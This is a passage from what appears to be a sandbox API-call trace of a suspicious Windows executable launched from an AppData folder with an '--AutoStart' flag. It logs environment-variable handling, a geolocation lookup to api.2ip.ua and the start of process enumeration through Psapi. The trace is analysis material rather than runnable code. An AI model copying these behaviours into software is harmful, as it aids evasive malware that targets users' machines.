lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0167.760] GetLastError () returned 0x0 [0167.760] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x48 [0167.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x4c) returned 0x6c1218 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0167.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x48) returned 0x6b7120 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x6b7120, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0167.760] GetLastError () returned 0x0 [0167.760] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x4c [0167.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x50) returned 0x6c1218 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0167.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x12) returned 0x6c10d0 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6c10d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0167.760] GetLastError () returned 0x0 [0167.760] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x50 [0167.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x54) returned 0x6c1218 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0167.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x18) returned 0x6c10f0 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6c10f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0167.760] GetLastError () returned 0x0 [0167.760] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x54 [0167.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x58) returned 0x6c1218 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1b) returned 0x6beea0 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x6beea0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0167.761] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x58 [0167.761] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x5c) returned 0x6c1218 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x24) returned 0x6bb080 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6bb080, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0167.761] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x5c [0167.761] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x60) returned 0x6c1218 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x29) returned 0x6bb760 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6bb760, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0167.761] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x60 [0167.761] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x64) returned 0x6c1218 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1e) returned 0x6beec8 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x6beec8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0167.761] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x64 [0167.761] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x68) returned 0x6c1218 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x6b) returned 0x6c1288 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x6c1288, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0167.761] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x68 [0167.761] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x6c) returned 0x6c1300 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0167.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x17) returned 0x6c1130 [0167.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6c1130, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x6c [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x70) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x14) returned 0x6c1150 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x6c1150, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x70 [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x74) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xf) returned 0x6b32b8 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x6b32b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x74 [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x78) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x16) returned 0x6c1218 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6c1218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x78 [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x7c) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2a) returned 0x6bb798 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6bb798, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x7c [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x80) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x29) returned 0x6bb7d0 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6bb7d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x80 [0167.762] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x84) returned 0x6c1300 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0167.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x16) returned 0x6c1238 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6c1238, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0167.762] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x84 [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x88) returned 0x6c1300 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0167.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x13) returned 0x6c1258 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x6c1258, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0167.763] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x88 [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x8c) returned 0x6c1300 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0167.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1f) returned 0x6beef0 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x6beef0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0167.763] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x8c [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x90) returned 0x6c1300 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0167.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x12) returned 0x6c1398 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6c1398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0167.763] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1300) returned 0x90 [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1300, Size=0x94) returned 0x6c13b8 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0167.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x18) returned 0x6c1300 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6c1300, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0167.763] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c13b8) returned 0x94 [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c13b8, Size=0x98) returned 0x6c13b8 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0167.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x46) returned 0x6b7170 [0167.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x6b7170, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0167.763] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c13b8) returned 0x98 [0167.763] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c13b8, Size=0x9c) returned 0x6c13b8 [0167.786] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.787] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.787] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8ec) returned 0x6c1fd0 [0167.799] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6b32d0 [0167.799] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.800] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.800] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.813] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.827] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0168.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b2930 [0168.473] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0171.498] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0171.499] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0171.499] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0171.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6d4cc0 [0171.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x240) returned 0x2c3f890 [0171.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3f890 | out: hHeap=0x6a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d4cc0 | out: hHeap=0x6a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b2930 | out: hHeap=0x6a0000) returned 1 [0171.526] GetCurrentProcess () returned 0xffffffff [0171.526] GetLastError () returned 0x0 [0171.527] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0171.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e18f8 [0171.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8ec) returned 0x6d8fb8 [0171.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2cc1938 [0171.592] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cc1938, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x8a [0171.592] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b") returned 1 [0171.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc2140 [0171.613] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0171.732] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x6e3540*="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0171.845] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0171.867] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0171.867] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x6e3540*="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0171.868] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0171.868] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76680000 [0171.868] GetProcAddress (hModule=0x76680000, lpProcName="EnumProcesses") returned 0x0 [0171.868] GetProcAddress (hModule=0x76680000, lpProcName="EnumProcessModules") returned 0x0 [0171.869] GetProcAddress (hModule=0x76680000, lpProcName="GetModuleBaseNameW") returned 0x0 [0171.869] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77430000 [0171.873] GetProcAddress (hModule=0x77430000, lpProcName="EnumProcesses") returned 0x77431544 [0171.873] GetProcAddress 